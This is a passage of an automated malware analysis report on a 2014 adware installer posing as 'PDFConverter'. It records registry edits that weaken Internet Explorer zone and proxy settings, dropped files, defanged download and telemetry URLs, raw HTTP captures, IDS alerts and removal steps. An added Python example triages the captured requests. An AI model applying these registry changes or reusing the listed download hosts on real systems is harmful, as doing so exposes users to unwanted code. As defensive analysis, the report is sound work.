[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
| MD5 | File path |
|---|---|
| 4fe781254735a3acda6d63343bb08796 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\LSAKGIUG\tmppack.exe |
| af94cca6a6fc581a7d729ee032865c93 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OVCXCDUB\SPIdentifierImpl[1].exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: PDFConverter
Product Name: PDFConverter
Product Version: 14.8.2.22
Legal Copyright: Copyright 2014
Legal Trademarks:
Original Filename: PDFConverterSetup.exe
Internal Name: PDFConverter
File Version: 14.8.2.22
File Description: PDFConverter
Comments:
Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 105413 | 105472 | 4.59843 | bfd7f7d360b8aad0ff0cd30b294b1092 |
| .rdata | 110592 | 24480 | 24576 | 3.36017 | 9869957f621b176bd10265c6395523e7 |
| .data | 135168 | 15584 | 7168 | 2.9786 | 723b697d9412f083bb01098280b13047 |
| .reloc | 151552 | 11124 | 11264 | 3.10209 | 6bfdb9c46deb2d71578128a908ad7754 |
| .rsrc | 163840 | 1051136 | 1051136 | 5.40831 | 7e1223ee8d85e8329289331fba2b7d9b |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 11
94837517c46b277edd407bf5f59b6eac
9c31d3acea9344088986b1e7abda3336
c8bfd3bc86b1c4a7e49be03b60b1323a
720b2ba22892b5619e41bc80014cb8a3
f88ce79ae02d3f580a988961020ca0e8
b1d9bd90fef59cfe397a6026671085c1
10de6da4ad38b35a6461e6d5f087346a
d24ca9127b81be63cfd8650949da03e4
a5d0bbd28fd6185324f21f04b908dff1
7f9281f25d7ff30ff358ffae9349bb52
c9d3fd95d4395f8f6079d25d50640c9d
URLs
| URL | IP |
|---|---|
| hxxp://ibbalance.ib.netdna-cdn.com/files/components/SPIdentifier_new.exe | |
| hxxp://e9287.g.akamaiedge.net/spidentifier/SPIdentifierImpl.exe | |
| hxxp://jazz-1846647836.us-east-1.elb.amazonaws.com/ | |
| hxxp://ibbalance.ib.netdna-cdn.com/files/components/Yahoo_w3i.exe | |
| hxxp://usyndication.com/api/productsession | |
| hxxp://usyndication.com/api/trackofferinstalldetails | |
| hxxp://usyndication.com/api/installerror | |
| hxxp://api.ibario.com/events | |
| hxxp://cdn.numiapps.com/files/components/Yahoo_w3i.exe | |
| hxxp://sp-storage.spccinta.com/spidentifier/SPIdentifierImpl.exe | |
| hxxp://sp-installer.databssint.com/ | |
| hxxp://cdn.numiapps.com/files/components/SPIdentifier_new.exe | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
Traffic
GET /spidentifier/SPIdentifierImpl.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: sp-storage.spccinta.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Last-Modified: Tue, 26 Aug 2014 19:09:55 GMT
Accept-Ranges: bytes
ETag: "fdb1c3e2dc67975ebdc9856b59404daf"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 1356392
Date: Tue, 26 Aug 2014 16:16:13 GMT
Connection: keep-alive
[response body: a Win32 PE executable (MZ/PE headers; section names visible in the dump: .text, .rdata, .data, .ndata, .rsrc; .ndata is the section NSIS installers use for their data); binary dump not reproduced]
<<< skipped >>>
GET /files/components/SPIdentifier_new.exe HTTP/1.1
Host: cdn.numiapps.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 26 Aug 2014 16:16:12 GMT
Content-Type: application/octet-stream
Content-Length: 77216
Connection: keep-alive
Last-Modified: Thu, 17 Jul 2014 09:52:28 GMT
Server: NetDNA-cache/2.2
Expires: Wed, 27 Aug 2014 16:16:12 GMT
Cache-Control: max-age=86400
X-Cache: HIT
Accept-Ranges: bytes
[response body: a Win32 PE executable (MZ/PE headers; section names visible in the dump: .text, .rdata, .data, .ndata, .rsrc; .ndata is the section NSIS installers use for their data); binary dump not reproduced]
<<< skipped >>>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: sp-installer.databssint.com
Content-Length: 263
Connection: Keep-Alive
Cache-Control: no-cache
{"event_type":"SPidentifier", "environment":"", "machine_ID":"25/Q9PAXFFGEFAJ1FJ/ZG7LUP H6S2JYYCQA 2MNEAGE2TFAMHC5/J7RKYVPF58A72LOANJ6WPB8HAKYGYWX7A", "result": "success", "failure_reason": "clean_machine", "SP_version": "", "carrier_ID": "", "carrier_type": ""}
HTTP/1.1 202 Accepted
Date: Tue, 26 Aug 2014 16:16:18 GMT
P3P: CP="NOI ADM DEV COM NAV OUR STP"
Server: Apache-Coyote/1.1
Content-Length: 0
Connection: keep-alive
POST /events HTTP/1.1
X-Token: 1ac1acb5747d4b6db021a1ac3947003b
X-Hash: 2d9e1e6b900580926b826b9fb6c837f60f5ae20f
Content-transfer-encoding: binary
Content-Type: application/octet-stream
Host: api.ibario.com
Content-Length: 272
Connection: Keep-Alive
{"timestamp":"2014-08-26 16:16:22","action":"start","custom":"eyJpbnN0YWxsZXJfaWQiOiI3MzgiLCJpbnN0YWxsZXJfdmVyc2lvbiI6IjE0LjcuMjkuMSIsInZhIjoiLTEiLCJzdmVyIjoiMS4wLjAuMCJ9","uuid":"75ed9567aa584c8ea8ea3cad7c47ab03","session":386136,"cid":"4448","cert":"ets","Country":"US"}
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Aug 2014 16:16:23 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=2
Vary: Accept-Encoding
X-Powered-By: PHP/5.4.13
Access-Control-Allow-Origin: *
27
{"flash":{},"error":false,"status":200}
0
POST /events HTTP/1.1
X-Token: 1ac1acb5747d4b6db021a1ac3947003b
X-Hash: c4fa2c556ec882d6507a8221b3639db9a962216c
Content-transfer-encoding: binary
Content-Type: application/octet-stream
Host: api.ibario.com
Content-Length: 290
Connection: Keep-Alive
{"timestamp":"2014-08-26 16:16:22","action":"show","component_id":685,"custom":"eyJpbnN0YWxsZXJfaWQiOiI3MzgiLCJpbnN0YWxsZXJfdmVyc2lvbiI6IjE0LjcuMjkuMSIsInZhIjoiLTEiLCJzdmVyIjoiMS4wLjAuMCJ9","uuid":"75ed9567aa584c8ea8ea3cad7c47ab03","session":386136,"cid":"4448","cert":"ets","Country":"US"}
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Aug 2014 16:16:23 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=2
Vary: Accept-Encoding
X-Powered-By: PHP/5.4.13
Access-Control-Allow-Origin: *
27
{"flash":{},"error":false,"status":200}
0
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Aug 2014 16:16:23 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=2
Vary: Accept-Encoding
X-Powered-By: PHP/5.4.13
Access-Control-Allow-Origin: *
27
{"flash":{},"error":false,"status":200}
0
POST /api/productsession HTTP/1.1
Content-Type: application/json; charset=utf-8
Accept: application/xml
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: usyndication.com
Content-Length: 115
Cache-Control: no-cache
{"CampaignName":"4448","AccountId":"14115","Detection":true,"Offers":true,"PartnerCode":"7663","ShortName":"yahoo"}
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/xml; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 26 Aug 2014 16:16:21 GMT
Content-Length: 1246
<response>
  <productsessionid>8c49579d-287c-4510-a720-a99e0e3efc89</productsessionid>
  <config>
    <host>;host</host>
    <month>8</month>
    <year>2014</year>
    <week>35</week>
    <campaignid>8888433</campaignid>
    <campaignname>4448</campaignname>
    <vendorid>7663</vendorid>
    <accountid>14115</accountid>
    <country>UA</country>
    <countryid>804</countryid>
    <ipaddress>193.138.244.231</ipaddress>
    <pingurl>hXXp://usyndication.com/api/productsession</pingurl>
    <postbackurl>hXXp://usyndication.com/api/trackofferinstalldetails</postbackurl>
    <errorurl>hXXp://usyndication.com/api/installerror</errorurl>
    <detectiontype>internal</detectiontype>
    <processtype>dynamic</processtype>
  </config>
  <offers />
  <restrictedoffers>
    <restrictedoffer>
      <offerid>19668</offerid>
      <offername>yahoo.brokerage.toolbar</offername>
      <restriction>CountryRestriction</restriction>
    </restrictedoffer>
    <restrictedoffer>
      <offerid>19669</offerid>
      <offername>yahoo.brokerage.defaultsearch</offername>
      <restriction>CountryRestriction</restriction>
    </restrictedoffer>
  </restrictedoffers>
  <detec<<< skipped >>>
POST /api/trackofferinstalldetails HTTP/1.1
Content-Type: application/json; charset=utf-8
Accept: application/xml
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: usyndication.com
Content-Length: 777
Cache-Control: no-cache
{"ProductSession":{"Session":{"AccountId":14115,"IPAddress":"193.138.244.231","CampaignId":8888433,"CampaignName":"4448","Country":"UA","CountryId":804},"ProductSessionId":"8c49579d-287c-4510-a720-a99e0e3efc89"},"Offers":[],"InstallTechProfile":{"OSId":5,"DefaultBrowserId":4,"LangId":1033},"InstallDetail":{"ParentProcess":"%original file name%.exe","ReturnCodeId":460,"InstallUnique":true,"InstallerVersion":"2.0.8.0","WindowsErrorCode":13},"ParentsDetected":[],"instfields":[{"Key":"pproc4","Value":"rc=460,os=5,ver=2.0.8.0,v=7663,a=14115,pp=%original file name%.exe"},{"Key":"BrokerResult2","Value":"460,13,WINXP,ie,default,ie,2.0.8.0,7663,14115"},{"Key":"BrokerTiming1","Value":"460,13,WINXP,ie,2.0.8.0,7663,0.0,0.47,0.703,0.0,-1,-1,-1,-1,-1,-1"}]}
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/xml; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 26 Aug 2014 16:16:21 GMT
Content-Length: 50
<response>
  <success>true</success>
</response>
POST /api/installerror HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: usyndication.com
Content-Length: 5433
Cache-Control: no-cache
Hostname=OB 2.0.8.0&Type=460&Message=7663, No detection rules were loaded!, l=0x0409&StatusCode=13&Source=browser.ie&Detail=L1:2014.08.26_19:16:20.0922[02E4] ------------------------------------------------------------------------------------------------------------
L1:2014.08.26_19:16:20.0922[02E4] Offer Broker 2.0.8.0 started...
L1:2014.08.26_19:16:20.0922[02E4] commandLine=/check /campaign=4448
L1:2014.08.26_19:16:20.0922[02E4] check=1
L1:2014.08.26_19:16:20.0922[02E4] offers=
L1:2014.08.26_19:16:20.0922[02E4] Checking system settings...
L1:2014.08.26_19:16:20.0937[02E4] default browser registry value="C(file path)iexplore.exe" -nohome
L1:2014.08.26_19:16:20.0937[02E4] target os=Microsoft Windows XP Service Pack 3 (Build 2600)
L1:2014.08.26_19:16:20.0937[02E4] target language=0x0409
L1:2014.08.26_19:16:20.0937[02E4] target browser=ie
L1:2014.08.26_19:16:20.0937[02E4] default browser=ie
L1:2014.08.26_19:16:20.0937[02E4] System check finished.
L1:2014.08.26_19:16:20.0937[02E4] Loading configuration...
L1:2014.08.26_19:16:20.0937[02E4] detectiontype=internal
L1:2014.08.26_19:16:20.0937[02E4] processtype=dynamic
L1:2014.08.26_19:16:20.0937[02E4] pingurl=hXXp://usyndication.com/api/productsession
L1:2014.08.26_19:16:20.0937[02E4] post
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 26 Aug 2014 16:16:21 GMT
Content-Length: 29
{"Response":{"success":true}}
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 26 Aug 2014 16:16:21 GMT
Content-Length: 29
{"Response":{"success":true}}
GET /files/components/Yahoo_w3i.exe HTTP/1.1
Host: cdn.numiapps.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 26 Aug 2014 16:16:19 GMT
Content-Type: application/octet-stream
Content-Length: 962216
Connection: keep-alive
Last-Modified: Mon, 25 Mar 2013 10:24:34 GMT
Server: NetDNA-cache/2.2
Expires: Wed, 27 Aug 2014 16:16:19 GMT
Cache-Control: max-age=86400
X-Cache: HIT
Accept-Ranges: bytes
[response body: a Win32 PE executable (MZ/PE headers; section names visible in the dump: .text, several .text-co* sections, .text-ti, .rdata, .data); binary dump not reproduced]
<<< skipped >>>
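As an added example (the editor's code, not part of the report or of any tool named on it), the following Python performs the triage an analyst would do on the captures above: it flags requests carrying the `NSIS_Inetc (Mozilla)` User-Agent that the ET POLICY signature keys on, lists the executables fetched over plain HTTP, and decodes the base64 `custom` field of the api.ibario.com events. The request blobs are constructed from the captures above with bodies trimmed; URLs are defanged with hxxp as the report does.

```python
# Added example, not from the report: triage raw HTTP requests the way the
# Traffic section is read. Sample requests are constructed from the captures
# in the report, with bodies trimmed to the fields the triage needs.
import base64
import json
import re

NSIS_UA = "NSIS_Inetc (Mozilla)"  # user agent of the NSIS inetc plug-in


def parse_request(raw):
    """Split one raw HTTP/1.x request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def decode_custom(body):
    """Decode the base64 'custom' member of an ibario events JSON body."""
    custom = json.loads(body)["custom"]
    padded = custom + "=" * (-len(custom) % 4)  # restore stripped padding
    return json.loads(base64.b64decode(padded))


def triage(raw_requests):
    """Return NSIS-UA hosts, PE download URLs and decoded installer telemetry."""
    result = {"nsis_ua_hosts": [], "pe_downloads": [], "installer_telemetry": []}
    for raw in raw_requests:
        method, path, headers, body = parse_request(raw)
        host = headers.get("host", "")
        if headers.get("user-agent") == NSIS_UA:
            result["nsis_ua_hosts"].append(host)
        if method == "GET" and re.search(r"\.exe$", path, re.IGNORECASE):
            result["pe_downloads"].append(f"hxxp://{host}{path}")
        if method == "POST" and host == "api.ibario.com" and path == "/events":
            result["installer_telemetry"].append(decode_custom(body))
    return result


# Constructed from the captures above; CRLF line endings as on the wire.
SAMPLE_REQUESTS = [
    "GET /spidentifier/SPIdentifierImpl.exe HTTP/1.1\r\n"
    "User-Agent: NSIS_Inetc (Mozilla)\r\n"
    "Host: sp-storage.spccinta.com\r\n"
    "Connection: Keep-Alive\r\n\r\n",
    "GET /files/components/SPIdentifier_new.exe HTTP/1.1\r\n"
    "Host: cdn.numiapps.com\r\n"
    "Connection: Keep-Alive\r\n\r\n",
    "POST /events HTTP/1.1\r\n"
    "X-Token: 1ac1acb5747d4b6db021a1ac3947003b\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Host: api.ibario.com\r\n\r\n"
    '{"timestamp":"2014-08-26 16:16:22","action":"start","custom":"'
    "eyJpbnN0YWxsZXJfaWQiOiI3MzgiLCJpbnN0YWxsZXJfdmVyc2lvbiI6IjE0LjcuMjkuMSIsInZhIjoiLTEiLCJzdmVyIjoiMS4wLjAuMCJ9"
    '","uuid":"75ed9567aa584c8ea8ea3cad7c47ab03","cid":"4448"}',
]

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_REQUESTS), indent=2))
```

The second download request carries no User-Agent at all, which is why the example keys on the `.exe` path as well as on the UA; the decoded `custom` field exposes the installer id and version that the events API is reporting in the clear.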
The Trojan connects to the servers at the following location(s) (see the URLs table above). Strings extracted from the sample and from the memory regions listed below:
.text
`.rdata
@.data
.reloc
B.rsrc
xSSSh
FTPjKS
FtPj;S
C.PjRV
operator
portuguese-brazilian
GetProcessWindowStation
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
GetProcessHeap
KERNEL32.dll
USER32.dll
GDI32.dll
GetCPInfo
zcÁ
2 4$4(4,4044484<4
1(141<1\1
>$><>@>\>`>
rCTPETaC^RTBBfwX_UcTB^DCRTfSq`W{yyuzpX}zqU.sxdata
.rsrc
<x.uW
OLEAUT32.dll
MSVCRT.dll
-p{Password}: set PasswordData Error in encrypted file. Wrong password?
CRC Failed in encrypted file. Wrong password?
Unsupported Method
Can not open encrypted archive. Wrong password?
Enter password (will not be echoed):
|,.YH
%FxCM
>%fVR
I7Q%C
!.rsm
.YZi/
.%DY2%
X&.VV
C.Hr:
%Sm6mo&K
0RI%d
).ppt
%9xFh
%u)Cq
!C.OH
S7%cPB
[x?%u
.oJK&3
-P1j}2
a%X/}w
EZ.NV
!.ZKW/
H;-ik3}[Z
6*_>%|!
Nb%d@1@
%xqa5t
N%.SN
Pd.in
H.zB|
l%uSb3
%sbTH
`is.EJ
H(5o.uOx
i.tC5
.Yr|o
mH5B%3S
b.kj.j
"%X{]OY.NE
.PkWn
.yg~N
.gmN.5
?o#%C
0)t%c
~h.BG!
AU%X=
wH?5%u
H.dnmI\Zm
`.MYh
"e%Sk
-;Ýhy
keyc]
I%UD/ J1
:%x}^7
(.zye
92)Z.hz
0I%X#
<.yG *
.JyOKkk
s!Msg
_E.JA
].kjWW
.pG_x
o.tMN
???(.%??
???(3.??
???(` ??
???(9*??
???(**??
!"#$%&'()* ,-./0123456789:;<=>?
?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????%u
@?)~@?)}
?;2 >;2 >;2!?;2!>;2!>;2!?;2!>;2 >;2 ?;1 >:1 ?:0
?=;8?:2'>;3)?;4*?<5 ><6,?=6-?=7-?=7.>=7.?=7.><6-?<6-?<5,>;5,?><:?-
?7, ?8/&?8/&?6
k* -s}}}qkik*,;=s,=:kik
s!==9sff*-'g'<$ (99:g*&$kik ('-&&s}y}}}qkik ( 0%&'sx{}|qzkik/ '-($&sykik9; *,.&'.sykik*&'-< =s
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>
GoDaddy.com, Inc.1301
*hXXp://certificates.godaddy.com/repository100.
'Go Daddy Secure Certification Authority1
079692870
ler.pak
\tmppack.exe
Ael32.dll
akernel32.dll
KERNEL32.DLL
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
c:\%original file name%.exe
7z.sfx
7z.sfx.exe
installer.pak
14.8.2.22
PDFConverterSetup.exe
%original file name%.exe_320_rwx_017D0000_00001000:
.text
`.rdata
@.data
.rsrc
@.reloc
%original file name%.exe_320_rwx_0194E000_00004000:
c:\%original file name%.exe
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
9.tmp:1968
nsr6.exe:1668
tmppack.exe:1628
2.tmp:500
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\broker\broker_check.log (185169 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\broker\config.xml (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\broker\timing.dat (121 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\broker\ping.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\broker\postback.xml (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\b4.gif (661 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\arrow.gif (207 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4175_attr_46.bmp (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\4169.html (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4167_feature_.png (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\btn2.png (402 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4166_attr_46.bmp (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4176_attr_3.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4174_attr_3.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4167_attr_46.bmp (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\corn1.png (139 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4171_attr_46.bmp (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\red-pb-act-right.jpg (694 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\corn3.png (138 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\js\utils.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\b-bg.gif (295 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\4171.html (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ajax-loader.gif (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\b3.gif (384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\js\config.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4167_attr_3.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\corn4.png (130 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\4176.html (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2.tmp (77 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\4167.html (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\4173.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4169_feature_835.png (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\pb-bg.jpg (333 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4175_attr_15.png (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\js\smart.js (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\js\jquery.noselect.min.js (299 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\events\events.js (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\lbg-top.gif (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4174_attr_46.bmp (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\corn2.png (136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\js\jquery-1.7.min.js (94 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\lbg-bottom.gif (8 bytes)
%System%\wbem\Logs\wbemprox.log (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4172_attr_46.bmp (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\9.tmp (6403 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\speedanalysis.ico (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\mid.jpg (403 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4173_attr_3.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\trust.gif (437 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4171_attr_3.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\idsqqskweu (2615 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4176_attr_46.bmp (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4175_attr_3.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\wizard.xml (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\LSAKGIUG\tmppack.exe (3804 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4169_attr_3.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\main_old.css (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\red-pb-act-left.jpg (681 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~39F.tmp (80 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\4175.html (19 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\btn.png (716 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4172_attr_3.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\check.jpg (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~6.tmp (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\old4167.html (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\red-pb-act.jpg (380 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\conditions\conditions.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4166_attr_3.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\4172.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\arrow.png (911 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\center2.jpg (305 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\4174.html (51 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\template_40.png (110 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ajax-loader2.gif (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\main.css (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\4166.html (33 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\pb-bg-right.jpg (468 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\lbg.gif (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\pb-bg-left.jpg (460 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4169_attr_46.bmp (42 bytes)
